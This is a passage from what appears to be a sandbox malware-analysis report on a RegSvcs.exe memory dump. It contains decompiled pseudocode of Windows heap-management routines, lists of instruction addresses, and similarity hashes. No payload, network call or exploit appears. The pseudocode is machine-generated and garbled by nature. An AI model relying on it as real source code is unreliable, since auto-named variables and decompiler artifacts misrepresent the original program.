								_push( *((intOrPtr*)(__ebp - 0x1c)));
								_push(__edx);
								_push(0xe);
								goto L46;
							case 4:
								_push(__ecx);
								_push(__ebx);
								_push(8);
								_push(__edx);
								_push(0xd);
								L46:
								goto L47;
							case 5:
								goto L45;
						}
					}
					L47:
					_t98 = E013BA80D(_t168);
				}
				return E0134D0D1(_t98);
			}


























                                          0x013afa2b
                                          0x013afa2b
                                          0x013afa2d
                                          0x013afa32
                                          0x013afa37
                                          0x013afa3a
                                          0x013afa3c
                                          0x013afa43
                                          0x013afa46
                                          0x013afa49
                                          0x013afa4f
                                          0x013afa55
                                          0x013afa58
                                          0x013afa5d
                                          0x013afa65
                                          0x013afa6d
                                          0x013afa72
                                          0x013afa78
                                          0x013afa7e
                                          0x013afa8c
                                          0x013afaa2
                                          0x013afaa7
                                          0x013afaaa
                                          0x013afaaf
                                          0x013afac4
                                          0x013afab1
                                          0x013afac0
                                          0x013afac0
                                          0x013afac8
                                          0x013afacb
                                          0x013afad5
                                          0x013afadb
                                          0x013afae1
                                          0x013afb05
                                          0x013afb05
                                          0x013afb08
                                          0x013afb0b
                                          0x013afb15
                                          0x013afb98
                                          0x013afb9f
                                          0x013afba5
                                          0x013afbb4
                                          0x013afbb6
                                          0x013afbb7
                                          0x013afbbd
                                          0x00000000
                                          0x013afbbd
                                          0x013afb17
                                          0x013afb17
                                          0x013afb17
                                          0x013afb1a
                                          0x013afb22
                                          0x013afb40
                                          0x013afb47
                                          0x013afb4c
                                          0x013afb4e
                                          0x013afb54
                                          0x013afb5a
                                          0x013afb5a
                                          0x013afb60
                                          0x013afb66
                                          0x013afb6d
                                          0x013afb70
                                          0x013afb73
                                          0x013afb78
                                          0x013afb7d
                                          0x013afb8c
                                          0x013afb90
                                          0x013afbbf
                                          0x013afbbf
                                          0x013afbc6
                                          0x013afbcd
                                          0x013afc18
                                          0x013afc18
                                          0x013afc23
                                          0x013afc3d
                                          0x013afc3d
                                          0x013afc25
                                          0x013afc25
                                          0x013afc2b
                                          0x013afc2d
                                          0x013afc33
                                          0x00000000
                                          0x00000000
                                          0x013afc33
                                          0x013afbcf
                                          0x013afbd9
                                          0x013afbdf
                                          0x013afc00
                                          0x013afc06
                                          0x013afbe1
                                          0x013afbe1
                                          0x013afbe3
                                          0x013afbe9
                                          0x013afbf5
                                          0x013afbeb
                                          0x013afbee
                                          0x013afbf0
                                          0x013afbf0
                                          0x013afbf7
                                          0x013afbfb
                                          0x013afc09
                                          0x013afc10
                                          0x013afc16
                                          0x00000000
                                          0x00000000
                                          0x013afc16
                                          0x013afbcd
                                          0x013afb7d
                                          0x013afb60
                                          0x013afb54
                                          0x013afb22
                                          0x013afae3
                                          0x013afae3
                                          0x013afaed
                                          0x00000000
                                          0x00000000
                                          0x013afaed
                                          0x013afae1
                                          0x013afad5
                                          0x013afa8c
                                          0x013afc44
                                          0x013afc72
                                          0x013afc7c
                                          0x013afc82
                                          0x013afc82
                                          0x013afc84
                                          0x013afc8a
                                          0x013afcca
                                          0x013afcca
                                          0x013afccb
                                          0x013afccc
                                          0x013afccf
                                          0x013afcd0
                                          0x00000000
                                          0x013afc8c
                                          0x013afc93
                                          0x00000000
                                          0x013afc9a
                                          0x013afc9b
                                          0x013afc9c
                                          0x013afc9f
                                          0x013afca0
                                          0x00000000
                                          0x00000000
                                          0x013afca4
                                          0x013afca5
                                          0x013afca6
                                          0x013afca9
                                          0x013afcaa
                                          0x00000000
                                          0x00000000
                                          0x013afcae
                                          0x013afcaf
                                          0x013afcb0
                                          0x013afcb2
                                          0x013afcb3
                                          0x00000000
                                          0x00000000
                                          0x013afcb7
                                          0x013afcb8
                                          0x013afcb9
                                          0x013afcbc
                                          0x013afcbd
                                          0x00000000
                                          0x00000000
                                          0x013afcc1
                                          0x013afcc2
                                          0x013afcc3
                                          0x013afcc5
                                          0x013afcc6
                                          0x013afcd2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013afc93
                                          0x013afcd3
                                          0x013afcd5
                                          0x013afcd5
                                          0x013afcdf

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8870937ba5adf60ec5520df0ff3d68866a8bbd539901d3219299b374c9f08db4
                                          • Instruction ID: eb79bbccc3fc15e22b9d86372e25fb3a9cf6f09ada17dcbd2a7de6a8c04e2c92
                                          • Opcode Fuzzy Hash: 8870937ba5adf60ec5520df0ff3d68866a8bbd539901d3219299b374c9f08db4
                                          • Instruction Fuzzy Hash: 5B818E7090064A9FDF28CF5AC4946BDFBF9FF18309F94815AE946AB681D3349881CF64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013BDBD2 Relevance: .2, Instructions: 212COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E013BDBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed short _v12;
				signed int _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				signed int _t112;
				signed int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x13e6114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = L013BD016(_t119, _t183, _t119, _t78);
									E0130FFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E013BC52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x12daff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										E0130FFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E013BE018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x12daff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E0133D340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E013BD864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E013BD8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E013BA80D( *_v20, 0x11, _a4, _v16);
					_t172 = 0;
				}
			}








































                                          0x013bdbdc
                                          0x013bdbde
                                          0x013bdbe1
                                          0x013bdbed
                                          0x013bdbef
                                          0x013bdbf7
                                          0x013bdbfd
                                          0x013bdc00
                                          0x013bdc04
                                          0x013bdc07
                                          0x013bdc0c
                                          0x013bdd1f
                                          0x013bdd1f
                                          0x013bdd23
                                          0x013bdd26
                                          0x013bdd29
                                          0x013bdd29
                                          0x013bdd2c
                                          0x013bdd32
                                          0x013bdd35
                                          0x00000000
                                          0x013bdd38
                                          0x013bdd3a
                                          0x013bdd5d
                                          0x013bdd63
                                          0x013bdd69
                                          0x013bdd6e
                                          0x013bdd71
                                          0x013bdd78
                                          0x013bdd7d
                                          0x013bdd8c
                                          0x013bdd9e
                                          0x013bdda0
                                          0x013bddad
                                          0x013bddb0
                                          0x013bddb5
                                          0x013bddb9
                                          0x013bddd9
                                          0x013bddd9
                                          0x013bddde
                                          0x013bdde0
                                          0x013bdde3
                                          0x013bdde5
                                          0x013bdde9
                                          0x013bdde9
                                          0x013bddee
                                          0x013bddf6
                                          0x013bddf6
                                          0x013bdd97
                                          0x00000000
                                          0x00000000
                                          0x013bdd9b
                                          0x00000000
                                          0x013bdd9b
                                          0x013bdd7f
                                          0x00000000
                                          0x013bdd7f
                                          0x013bdd3f
                                          0x013bdd54
                                          0x013bdd58
                                          0x013bdd86
                                          0x00000000
                                          0x013bdd86
                                          0x00000000
                                          0x013bdd5a
                                          0x013bdd5a
                                          0x013bdd5a
                                          0x00000000
                                          0x013bdd5a
                                          0x013bdd3f
                                          0x013bdd38
                                          0x013bdc12
                                          0x013bdc15
                                          0x013bdc25
                                          0x013bdc31
                                          0x013bdc34
                                          0x013bdc3b
                                          0x013bdc3e
                                          0x013bdc40
                                          0x013bdc43
                                          0x013bdc46
                                          0x013bdc62
                                          0x013bdc6b
                                          0x013bdc6d
                                          0x013bdc48
                                          0x013bdc4b
                                          0x013bdc59
                                          0x013bdc5c
                                          0x013bdc5c
                                          0x013bdc72
                                          0x013bdc78
                                          0x013bdc7f
                                          0x013bdc81
                                          0x013bdc81
                                          0x013bdc84
                                          0x013bdc88
                                          0x013bdc8d
                                          0x013bdc95
                                          0x013bdc9b
                                          0x013bdca0
                                          0x013bdca2
                                          0x013bdca6
                                          0x013bdca6
                                          0x013bdcb0
                                          0x013bdcd1
                                          0x013bdcd4
                                          0x013bdcda
                                          0x013bdcec
                                          0x013bdcf1
                                          0x013bdcf6
                                          0x013bdd0c
                                          0x013bdd1a
                                          0x013bdd1a
                                          0x013bdcf6
                                          0x00000000
                                          0x013bdcda
                                          0x013bdcb5
                                          0x013bdcb6
                                          0x013bdcc5
                                          0x013bdcca
                                          0x013bdcca

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4af4b7a4405460370a6857c3e53da536bee1da5118ffae888932a04db976903f
                                          • Instruction ID: 10ef0b3ef8a5dad0c22b1f5fc3858b18cd8ee63b4fd7d037b8851af2f991c2cc
                                          • Opcode Fuzzy Hash: 4af4b7a4405460370a6857c3e53da536bee1da5118ffae888932a04db976903f
                                          • Instruction Fuzzy Hash: 8B71F675A0012A9FCF14DF99C4C09FEBBF5EF88218B14416DEA85EB784E634C945CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C28EC Relevance: .2, Instructions: 211COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E013C28EC(signed int __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				unsigned int _t62;
				unsigned int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t77;
				intOrPtr _t85;
				unsigned int _t95;
				signed int _t98;
				signed int _t100;
				void* _t104;
				signed short _t108;
				signed int _t113;
				intOrPtr _t115;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t136;
				signed int _t137;
				signed int _t140;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				void* _t156;

				_t115 = _a4;
				_v40 = __edx;
				_t147 = __ecx;
				_v20 = __ecx;
				if(__edx != _t115) {
					_t115 = _t115 + 2;
				}
				_t62 = _t115 + 7 >> 3;
				_t120 = _t62 + 1;
				_v28 = _t120;
				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
					_t120 = _t62 + 2;
					_v28 = _t120;
				}
				_t64 = _t120 + _t120 & 0x0000ffff;
				_t136 = _a8 & 0x00000001;
				_v36 = _t120 + _t120 & 0x0000ffff;
				_v12 = _t136;
				if(_t136 == 0) {
					E01312280(_t64, _t147);
					_t136 = _v12;
				}
				_v5 = 0xff;
				while(1) {
					L7:
					_t121 = 0;
					_t145 =  *(_t147 + 8);
					_v24 =  *(_t147 + 0xc) & 1;
					_v16 = 0;
					if(_t145 == 0) {
						goto L17;
					}
					_t108 =  *0x13e6110; // 0x7900493f
					_v32 = _t108 & 0x0000ffff;
					do {
						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
						if(_t156 < 0) {
							__eflags = _v24;
							_t121 = _t145;
							_t113 =  *_t145;
							_v16 = _t121;
							if(_v24 == 0) {
								L15:
								_t145 = _t113;
								goto L16;
							}
							__eflags = _t113;
							if(_t113 == 0) {
								goto L15;
							}
							_t145 = _t145 ^ _t113;
							goto L16;
						}
						if(_t156 <= 0) {
							L18:
							if(_t145 != 0) {
								_t122 =  *0x13e6110; // 0x7900493f
								_t36 = _t145 - 4; // -4
								_t116 = _t36;
								_t137 = _t116;
								_t69 =  *_t116 ^ _t122 ^ _t116;
								__eflags = _t69;
								if(_t69 >= 0) {
									_t71 = _t69 >> 0x00000010 & 0x00007fff;
									__eflags = _t71;
									if(_t71 == 0) {
										L36:
										_t72 = 0;
										__eflags = 0;
										L37:
										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
										if(__eflags == 0) {
											_t77 = E013C25DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
											__eflags = _t77;
											if(_t77 == 0) {
												L39:
												_t148 = 0;
												__eflags = _v12;
												if(_v12 != 0) {
													L42:
													return _t148;
												}
												E0130FFB0(_t116, _t145, _v20);
												L41:
												_t148 = 0;
												__eflags = 0;
												goto L42;
											}
											_t46 = _t116 + 8; // 0x4
											_t148 = _t46;
											_t140 = (( *_t116 ^  *0x13e6110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
											_t85 = _v20;
											__eflags =  *(_t85 + 0x38) & 0x00000001;
											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
												_t118 = _t116 + 0x10;
												__eflags = _t118 & 0x00000fff;
												if((_t118 & 0x00000fff) == 0) {
													_t148 = _t118;
													_t140 = _t140 - 8;
													__eflags = _t140;
												}
											}
											_t117 = _v40;
											_t124 =  *_t145;
											__eflags = _t117 - _t140;
											if(_t117 >= _t140) {
												_t125 = _t124 & 0xfffffeff;
												__eflags = _t125;
												 *_t145 = _t125;
											} else {
												_t126 = _t124 | 0x00000100;
												_push(_t126);
												 *_t145 = _t126;
												E013C2506(_t148, _t140, _t140 - _t117);
												_t85 = _v20;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												E0130FFB0(_t117, _t145, _t85);
											}
											__eflags = _a8 & 0x00000002;
											if((_a8 & 0x00000002) != 0) {
												E0133FA60(_t148, 0, _t117);
											}
											goto L42;
										}
										_push(_t122);
										_push(0);
										E013BA80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
										goto L39;
									}
									_t137 = _t116 - (_t71 << 3);
									_t95 =  *_t137 ^ _t122 ^ _t137;
									__eflags = _t95;
									if(_t95 < 0) {
										L34:
										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
										__eflags = _t98;
										L35:
										_t72 = _t98 & 0x000000ff;
										goto L37;
									}
									_t100 = _t95 >> 0x00000010 & 0x00007fff;
									__eflags = _t100;
									if(_t100 == 0) {
										goto L36;
									}
									_t137 = _t137 + _t100 * 0xfffffff8;
									__eflags = _t137;
									goto L34;
								}
								_t98 =  *_t145 ^ _t122 ^ _t116;
								goto L35;
							}
							if(_t136 == 0) {
								E0130FFB0(_t115, _t145, _t147);
							}
							_t104 = E013C3149(_t147, _t115, _a8);
							_t146 = _t104;
							if(_t104 == 0) {
								goto L41;
							} else {
								if(_v12 == 0) {
									E01312280(_t104, _t147);
								}
								_v5 = 0xff;
								E013C2876(_t147, _t146);
								_t136 = _v12;
								goto L7;
							}
						}
						_t113 =  *(_t145 + 4);
						if(_v24 == 0 || _t113 == 0) {
							_t121 = _v16;
							goto L15;
						} else {
							_t121 = _v16;
							_t145 = _t145 ^ _t113;
						}
						L16:
					} while (_t145 != 0);
					L17:
					_t145 = _t121;
					goto L18;
				}
			}











































                                          0x013c28f5
                                          0x013c28fa
                                          0x013c28fe
                                          0x013c2900
                                          0x013c2906
                                          0x013c2908
                                          0x013c2908
                                          0x013c290e
                                          0x013c2915
                                          0x013c2918
                                          0x013c291b
                                          0x013c291d
                                          0x013c2920
                                          0x013c2920
                                          0x013c2929
                                          0x013c292c
                                          0x013c292f
                                          0x013c2932
                                          0x013c2935
                                          0x013c2938
                                          0x013c293d
                                          0x013c293d
                                          0x013c2940
                                          0x013c2944
                                          0x013c2944
                                          0x013c2948
                                          0x013c294a
                                          0x013c2950
                                          0x013c2953
                                          0x013c2958
                                          0x00000000
                                          0x00000000
                                          0x013c295a
                                          0x013c2962
                                          0x013c2965
                                          0x013c2976
                                          0x013c2978
                                          0x013c29e0
                                          0x013c29e4
                                          0x013c29e6
                                          0x013c29e8
                                          0x013c29eb
                                          0x013c2993
                                          0x013c2993
                                          0x00000000
                                          0x013c2993
                                          0x013c29ed
                                          0x013c29ef
                                          0x00000000
                                          0x00000000
                                          0x013c29f1
                                          0x00000000
                                          0x013c29f1
                                          0x013c297a
                                          0x013c299b
                                          0x013c299d
                                          0x013c29f5
                                          0x013c29fb
                                          0x013c29fb
                                          0x013c2a00
                                          0x013c2a04
                                          0x013c2a04
                                          0x013c2a06
                                          0x013c2a13
                                          0x013c2a13
                                          0x013c2a18
                                          0x013c2a44
                                          0x013c2a44
                                          0x013c2a44
                                          0x013c2a46
                                          0x013c2a50
                                          0x013c2a5a
                                          0x013c2a5e
                                          0x013c2a99
                                          0x013c2a9e
                                          0x013c2aa0
                                          0x013c2a70
                                          0x013c2a70
                                          0x013c2a72
                                          0x013c2a75
                                          0x013c2a82
                                          0x013c2a89
                                          0x013c2a89
                                          0x013c2a7a
                                          0x013c2a7f
                                          0x013c2a7f
                                          0x013c2a7f
                                          0x00000000
                                          0x013c2a7f
                                          0x013c2aa4
                                          0x013c2aa4
                                          0x013c2ab6
                                          0x013c2abd
                                          0x013c2ac0
                                          0x013c2ac4
                                          0x013c2ac6
                                          0x013c2ac9
                                          0x013c2acf
                                          0x013c2ad1
                                          0x013c2ad3
                                          0x013c2ad3
                                          0x013c2ad3
                                          0x013c2acf
                                          0x013c2ad6
                                          0x013c2ad9
                                          0x013c2adb
                                          0x013c2add
                                          0x013c2af9
                                          0x013c2af9
                                          0x013c2aff
                                          0x013c2adf
                                          0x013c2adf
                                          0x013c2ae7
                                          0x013c2aea
                                          0x013c2aef
                                          0x013c2af4
                                          0x013c2af4
                                          0x013c2b01
                                          0x013c2b05
                                          0x013c2b08
                                          0x013c2b08
                                          0x013c2b0d
                                          0x013c2b11
                                          0x013c2b1b
                                          0x013c2b20
                                          0x00000000
                                          0x013c2b11
                                          0x013c2a60
                                          0x013c2a61
                                          0x013c2a6b
                                          0x00000000
                                          0x013c2a6b
                                          0x013c2a1f
                                          0x013c2a25
                                          0x013c2a25
                                          0x013c2a27
                                          0x013c2a38
                                          0x013c2a3d
                                          0x013c2a3d
                                          0x013c2a3f
                                          0x013c2a3f
                                          0x00000000
                                          0x013c2a3f
                                          0x013c2a2c
                                          0x013c2a2c
                                          0x013c2a31
                                          0x00000000
                                          0x00000000
                                          0x013c2a36
                                          0x013c2a36
                                          0x00000000
                                          0x013c2a36
                                          0x013c2a0c
                                          0x00000000
                                          0x013c2a0c
                                          0x013c29a1
                                          0x013c29a4
                                          0x013c29a4
                                          0x013c29b0
                                          0x013c29b5
                                          0x013c29b9
                                          0x00000000
                                          0x013c29bf
                                          0x013c29c3
                                          0x013c29c6
                                          0x013c29c6
                                          0x013c29cd
                                          0x013c29d3
                                          0x013c29d8
                                          0x00000000
                                          0x013c29d8
                                          0x013c29b9
                                          0x013c2980
                                          0x013c2983
                                          0x013c2990
                                          0x00000000
                                          0x013c2989
                                          0x013c2989
                                          0x013c298c
                                          0x013c298c
                                          0x013c2995
                                          0x013c2995
                                          0x013c2999
                                          0x013c2999
                                          0x00000000
                                          0x013c2999

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbf92d80a3396a10d8283b78d7555ebaf854a9876a451b5bbb94188b42c17497
                                          • Instruction ID: 1fed31b8128b1a9894628eb134ba3ae9ef3a10a718bcabf1b5c670651e09c685
                                          • Opcode Fuzzy Hash: fbf92d80a3396a10d8283b78d7555ebaf854a9876a451b5bbb94188b42c17497
                                          • Instruction Fuzzy Hash: 3071F475A0020A9BEB29CF6DC8806AFBBF6EF58B58F14816DD915D7280DB34DD01C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132138B Relevance: .2, Instructions: 206COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E0132138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t97;
				signed int _t102;
				void* _t105;
				char* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				signed int* _t122;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				char _t150;
				intOrPtr _t153;
				signed int _t161;
				signed int _t163;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;

				_t182 = __ecx;
				_t153 = _a24;
				_t183 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t97 = _t153 - _a16;
				if(_t97 > 0xfffff000) {
					L19:
					return 0;
				}
				asm("cdq");
				_t150 = _a20;
				_v16 = _t97 / 0x1000;
				_t102 = _a4 + 0x00000007 & 0xfffffff8;
				_t170 = _t102 + __edx;
				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
				_t105 = _t170 + 0x28;
				_v12 = _t170;
				if(_t105 >= _t150) {
					if(_t105 >= _t153) {
						goto L19;
					}
					_v8 = _t170 - _t150 + 8;
					_push(E01320678(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E01339660() < 0) {
						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
						goto L19;
					}
					if(E01317D50() == 0) {
						_t112 = 0x7ffe0380;
					} else {
						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E013B138A(_t150, _t182, _a20, _v8, 3);
					}
					_t150 = _a20 + _v8;
					_t153 = _a24;
					_a20 = _t150;
				}
				_t183[0] = 1;
				_t113 = _t153 - _t150;
				_t183[1] = 1;
				asm("cdq");
				_t175 = _t113 % 0x1000;
				_v28 = _t113 / 0x1000;
				 *_t183 = _v20;
				_t183[1] =  *(_t182 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t117 = E013216C7(1, _t175);
					_t150 = _a20;
					_t183[0xd] = _t117;
				}
				_t183[0xb] = _t183[0xb] & 0x00000000;
				_t176 = _v12;
				_t183[3] = _a12;
				_t119 = _a16;
				_t183[7] = _t119;
				_t161 = _v16 << 0xc;
				_t183[6] = _t182;
				_t183[0xa] = _t119 + _t161;
				_t183[8] = _v16;
				_t122 =  &(_t183[0xe]);
				_t183[2] = 0xffeeffee;
				_t183[9] = _t176;
				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
				_t122[1] = _t122;
				 *_t122 = _t122;
				if(_t183[6] != _t183) {
					_t124 = 1;
				} else {
					_t124 = 0;
				}
				_t183[1] = _t124;
				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
				if(_t183[6] != _t183) {
					_t130 = (_t176 - _t183 >> 0x10) + 1;
					_v24 = _t130;
					if(_t130 >= 0xfe) {
						_push(_t161);
						_push(0);
						E013BA80D(_t183[6], 3, _t176, _t183);
						_t150 = _a20;
						_t176 = _v12;
						_t130 = _v24;
					}
				} else {
					_t130 = 0;
				}
				 *(_t176 + 6) = _t130;
				E0131B73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
				}
				if(_v8 != 0) {
					E0131A830(_t182, _v12, _v8);
				}
				_t136 = _t182 + 0xa4;
				_t184 =  &(_t183[4]);
				_t163 =  *(_t136 + 4);
				if( *_t163 != _t136) {
					_push(_t163);
					_push( *_t163);
					E013BA80D(0, 0xd, _t136, 0);
				} else {
					 *_t184 = _t136;
					_t184[1] = _t163;
					 *_t163 = _t184;
					 *(_t136 + 4) = _t184;
				}
				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
				return 1;
			}































                                          0x0132139f
                                          0x013213a1
                                          0x013213a4
                                          0x013213a6
                                          0x013213ab
                                          0x013213b3
                                          0x01365522
                                          0x00000000
                                          0x01365522
                                          0x013213b9
                                          0x013213c1
                                          0x013213c4
                                          0x013213cd
                                          0x013213d0
                                          0x013213d9
                                          0x013213dc
                                          0x013213df
                                          0x013213e4
                                          0x0136552b
                                          0x00000000
                                          0x00000000
                                          0x01365534
                                          0x0136553f
                                          0x01365545
                                          0x01365549
                                          0x0136554a
                                          0x0136554f
                                          0x01365550
                                          0x01365559
                                          0x0136551c
                                          0x00000000
                                          0x0136551c
                                          0x01365562
                                          0x01365574
                                          0x01365564
                                          0x0136556d
                                          0x0136556d
                                          0x0136557c
